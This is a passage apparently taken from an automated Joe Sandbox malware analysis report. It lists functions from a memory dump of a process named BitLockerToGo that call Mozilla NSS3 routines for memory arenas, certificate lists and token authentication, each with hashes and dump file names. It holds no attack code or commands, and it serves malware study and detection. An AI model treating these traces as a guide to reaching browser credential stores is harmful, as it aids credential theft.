                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe1274bd5405677ad4e2c84a5620f2c5095d078987e3851db26f19bdd0ee6193
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A3127B4A06706CFDB00EF68C48466ABBF4FF49344B108569E95AD7700EB30E894CBA5
                                                                                                                                                                                                                                                                                                                                                          Function 6C6B2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C6B2E08
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: TlsGetValue.KERNEL32 ref: 6C6A14E0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: EnterCriticalSection.KERNEL32 ref: 6C6A14F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: PR_Unlock.NSS3 ref: 6C6A150D
                                                                                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000400), ref: 6C6B2E1C
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C6B2E3B
                                                                                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6B2E95
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C6488A4,00000000,00000000), ref: 6C6A1228
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C6A1238
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C6488A4,00000000,00000000), ref: 6C6A124B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1200: PR_CallOnce.NSS3(6C7A2AA4,6C6A12D0,00000000,00000000,00000000,?,6C6488A4,00000000,00000000), ref: 6C6A125D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C6A126F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C6A1280
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C6A128E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C6A129A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C6A12A1
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1441289343-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 152bf162b1b01fbe2f7b0ea0115a304646f8551be1f22680196ba5f3e9da5911
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3210BB5D003454BE700CF559D487AA37A4AF9230CF110269FD087B752F7B1E9AAC399
                                                                                                                                                                                                                                                                                                                                                          Function 6C66ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • CERT_NewCertList.NSS3 ref: 6C66ACC2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C642F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C642F0A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C642F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C642F1D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C642AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C640A1B,00000000), ref: 6C642AF0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C642AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C642B11
                                                                                                                                                                                                                                                                                                                                                          • CERT_DestroyCertList.NSS3(00000000), ref: 6C66AD5E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6857D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C64B41E,00000000,00000000,?,00000000,?,6C64B41E,00000000,00000000,00000001,?), ref: 6C6857E0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6857D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C685843
                                                                                                                                                                                                                                                                                                                                                          • CERT_DestroyCertList.NSS3(?), ref: 6C66AD36
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C642F50: CERT_DestroyCertificate.NSS3(?), ref: 6C642F65
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C642F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C642F83
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C66AD4F
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 132756963-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 217f92b83e5b8f7a8de1edacb318ab2fd3fd7303362d2953ea727ca8252cbb74
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9ad6a3b3374bcaf03a958c1bec2cbccfa0abef78907807223eceb7113f7d92bf
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 217f92b83e5b8f7a8de1edacb318ab2fd3fd7303362d2953ea727ca8252cbb74
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D21C6B1D001148BEB10DF66D8055EEB7F4EF06208F558068D805B7B02FB31AA45CBEA
                                                                                                                                                                                                                                                                                                                                                          Function 6C693C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C693C9E
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C693CAE
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C693CEA
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C693D02
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 284873373-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 68d91d96ad0515408d646e4174c3ec2f5746776f45084629187c605f68507004
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 52d732b70c155d04f38c0c1dd43fc32f3fa27ea9264561e01978068c60ca5f04
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68d91d96ad0515408d646e4174c3ec2f5746776f45084629187c605f68507004
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F11D675A00605AFDB009F24DC48A9A37B8EF4A368F554071FC088B711D731ED54C7E5
                                                                                                                                                                                                                                                                                                                                                          Function 6C69ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C69F0AD,6C69F150,?,6C69F150,?,?,?), ref: 6C69ECBA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6487ED,00000800,6C63EF74,00000000), ref: 6C6A1000
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: PR_NewLock.NSS3(?,00000800,6C63EF74,00000000), ref: 6C6A1016
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6487ED,00000008,?,00000800,6C63EF74,00000000), ref: 6C6A102B
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C69ECD1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A10F3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: EnterCriticalSection.KERNEL32(?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A110C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1141
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PR_Unlock.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1182
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A119C
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C69ED02
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A116E
                                                                                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C69ED5A
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2957673229-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6fce6bc687ef580531e1b1156cd3e0731560d278c6282a850d3137b474c0890b
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E021A4B59007429BE700CF25D944B52B7E4BFA5348F15C215E81C87661EB70E994C6D8
                                                                                                                                                                                                                                                                                                                                                          Function 6C66C860 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PK11_IsLoggedIn.NSS3(?,?), ref: 6C66C890
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C668F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C668FAF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C668F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C668FD1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C668F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C668FFA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C668F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C669013
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C668F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C669042
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C668F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C66905A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C668F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C669073
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C668F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C669111
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C66C8B2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709BF0: TlsGetValue.KERNEL32(?,?,?,6C750A75), ref: 6C709C07
                                                                                                                                                                                                                                                                                                                                                          • PK11_Authenticate.NSS3(?,00000001,?), ref: 6C66C8D0
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C66C8EB
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: K11_Value$CriticalEnterSectionUnlock$AuthenticateCurrentInternalItem_LoggedSlotThreadUtilZfree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 999015661-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 77f3591b2b928c3f3ae8cfb269284d3d1595c3d604f9488ee32516e206fbd7a3
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6901A966E015117BDB1026B76C80ABF3D699B4635CF040139FD05A7F12F761981893AB
                                                                                                                                                                                                                                                                                                                                                          Function 6C694900 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE09A,00000000,00000004,6C67C79F,?,?,6C695C4A,?), ref: 6C694950
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: TlsGetValue.KERNEL32(?,6C6A085A,00000000,?,6C648369,?), ref: 6C698821
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: TlsGetValue.KERNEL32(?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C69883D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: EnterCriticalSection.KERNEL32(?,?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C698856
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C698887
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: PR_Unlock.NSS3(?,?,?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C698899
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?), ref: 6C69496A
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C69497A
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C694989
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3904631464-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3db7893e4633d6510f01ec7fcca130c680f081fd1f677bbb99c9e67bff963921
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a1833e846fff131a10026dbdd64cb101a5079a430eabbe6de254d38d4181d068
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3db7893e4633d6510f01ec7fcca130c680f081fd1f677bbb99c9e67bff963921
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE1108B1A042029FEB005F69EC45A6A77B8FF0736DF140135ED69D7B11EB21E814879D
                                                                                                                                                                                                                                                                                                                                                          Function 6C6CEDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C6B7FFA,?,6C6B9767,?,8B7874C0,0000A48E), ref: 6C6CEDD4
                                                                                                                                                                                                                                                                                                                                                          • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C6B7FFA,?,6C6B9767,?,8B7874C0,0000A48E), ref: 6C6CEDFD
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,00000000,00000000,6C6B7FFA,?,6C6B9767,?,8B7874C0,0000A48E), ref: 6C6CEE14
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: malloc.MOZGLUE(6C698D2D,?,00000000,?), ref: 6C6A0BF8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: TlsGetValue.KERNEL32(6C698D2D,?,00000000,?), ref: 6C6A0C15
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,6C6B9767,00000000,00000000,6C6B7FFA,?,6C6B9767,?,8B7874C0,0000A48E), ref: 6C6CEE33
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3903481028-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c72d6c10ae9b427bd582e6c6bcd4223db5dd34584da715502c2e389277591f8a
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3b56a348f591eb3344f2d70c113b91476b781137c693baae919c8327c57e2e0a
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c72d6c10ae9b427bd582e6c6bcd4223db5dd34584da715502c2e389277591f8a
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4011A771B04706ABD7109E65DC89B46B3B8EB0439DF104531E91986A00E731F465C7EA
                                                                                                                                                                                                                                                                                                                                                          Function 6C6B08D0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
